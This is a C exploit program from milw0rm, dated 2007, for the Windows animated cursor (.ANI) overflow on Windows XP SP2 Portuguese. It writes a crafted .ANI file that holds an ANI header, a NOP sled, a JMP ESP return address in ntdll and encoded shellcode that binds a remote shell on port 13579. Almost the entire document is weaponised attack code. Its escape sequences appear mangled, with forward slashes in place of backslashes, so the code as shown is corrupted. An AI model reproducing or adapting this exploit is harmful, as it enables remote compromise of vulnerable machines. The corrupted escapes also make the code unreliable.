/* .ANI exploit tested on Windows XP SP2 - Portuguese Shellcode port bind 13579 JMP ESP Addr - ntdll.dll Greetz: Marsu, Devcode, Str0ke, Dave, Sekure.org guys, Sauna. Exploit coded listen sauna hits Featuring Luiz Zanardo's gigs "Minoide -?/x52/x49/x46/x46/x00/x04/x00/x41" @ www.myspace.com/fuzzyproject Breno Silva Pinto bsilva[at]Sekure.org */ #include <stdio.h> #include <stdlib.h> #include <windows.h> unsigned char aniheader[] = "/x52/x49/x46/x46/x00/x04/x00/x00/x41/x43/x4F/x4E/x61/x6E/x69/x68" "/x24/x00/x00/x00/x24/x00/x00/x00/xFF/xFF/x00/x00/x0A/x00/x00/x00" "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00" "/x10/x00/x00/x00/x01/x00/x00/x00/x54/x53/x49/x4C/x03/x00/x00/x00" "/x10/x00/x00/x00/x54/x53/x49/x4C/x03/x00/x00/x00/x02/x02/x02/x02" "/x61/x6E/x69/x68/xA8/x03/x00/x00"; unsigned char Shellcode[] = "/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90" "/x29/xc9/x83/xe9/xaf/xd9/xee/xd9/x74/x24/xf4/x5b/x81/x73/x13/x8f" "/x35/x37/x85/x83/xeb/xfc/xe2/xf4/x73/x5f/xdc/xca/x67/xcc/xc8/x7a" "/x70/x55/xbc/xe9/xab/x11/xbc/xc0/xb3/xbe/x4b/x80/xf7/x34/xd8/x0e" "/xc0/x2d/xbc/xda/xaf/x34/xdc/x66/xbf/x7c/xbc/xb1/x04/x34/xd9/xb4" "/x4f/xac/x9b/x01/x4f/x41/x30/x44/x45/x38/x36/x47/x64/xc1/x0c/xd1" "/xab/x1d/x42/x66/x04/x6a/x13/x84/x64/x53/xbc/x89/xc4/xbe/x68/x99" "/x8e/xde/x34/xa9/x04/xbc/x5b/xa1/x93/x54/xf4/xb4/x4f/x51/xbc/xc5" "/xbf/xbe/x77/x89/x04/x45/x2b/x28/x04/x75/x3f/xdb/xe7/xbb/x79/x8b" "/x63/x65/xc8/x53/xbe/xee/x51/xd6/xe9/x5d/x04/xb7/xe7/x42/x44/xb7" "/xd0/x61/xc8/x55/xe7/xfe/xda/x79/xb4/x65/xc8/x53/xd0/xbc/xd2/xe3" "/x0e/xd8/x3f/x87/xda/x5f/x35/x7a/x5f/x5d/xee/x8c/x7a/x98/x60/x7a" "/x59/x66/x64/xd6/xdc/x66/x74/xd6/xcc/x66/xc8/x55/xe9/x5d/x02/x8e" "/xe9/x66/xbe/x64/x1a/x5d/x93/x9f/xff/xf2/x60/x7a/x59/x5f/x27/xd4" "/xda/xca/xe7/xed/x2b/x98/x19/x6c/xd8/xca/xe1/xd6/xda/xca/xe7/xed" "/x6a/x7c/xb1/xcc/xd8/xca/xe1/xd5/xdb/x61/x62/x7a/x5f/xa6/x5f/x62" "/xf6/xf3/x4e/xd2/x70/xe3/x62/x7a/x5f/x53/x5d/xe1/xe9/x5d/x54/xe8" "/x06/xd0/x5d/xd5/xd6/x1c/xfb/x0c/x68/x5f/x73/x0c/x6d/x04/xf7/x76" "/x25/xcb/x75/xa8/x71/x77/x1b/x16/x02/x4f/x0f/x2e/x24/x9e/x5f/xf7" "/x71/x86/x21/x7a/xfa/x71/xc8/x53/xd4/x62/x65/xd4/xde/x64/x5d/x84" "/xde/x64/x62/xd4/x70/xe5/x5f/x28/x56/x30/xf9/xd6/x70/xe3/x5d/x7a" "/x70/x02/xc8/x55/x04/x62/xcb/x06/x4b/x51/xc8/x53/xdd/xca/xe7/xed" "/xf1/xed/xd5/xf6/xdc/xca/xe1/x7a/x5f/x35/x37/x85"; int main( int argc, char **argv ) { char Buffer[1024]; FILE *f; if ( argc < 2 ) { printf("usage %s <file.ani>/n",argv[0]); return 0; } memset( Buffer, 0x90, sizeof( Buffer ) ); memcpy( Buffer, aniheader, sizeof( aniheader ) - 1 ); memcpy( Buffer + 168, "/xed/x1e/x94/x7c", 4 ); // JMP ESP - NTDLL. Hey Dave ... this is for you brotha! memcpy( Buffer + 198, Shellcode, sizeof( Shellcode ) - 1 ); f = fopen( argv[1], "wb" ); if ( f == NULL ) { printf("Cannot create file/n"); return 0; } fwrite(Buffer, 1, 1024, f); fclose(f); printf(".ANI file created!/n"); return 0; } // milw0rm.com [2007-04-09]
MS Windows Animated Cursor (.ANI) Local Overflow Exploit
最新推荐文章于 2024-10-18 20:09:44 发布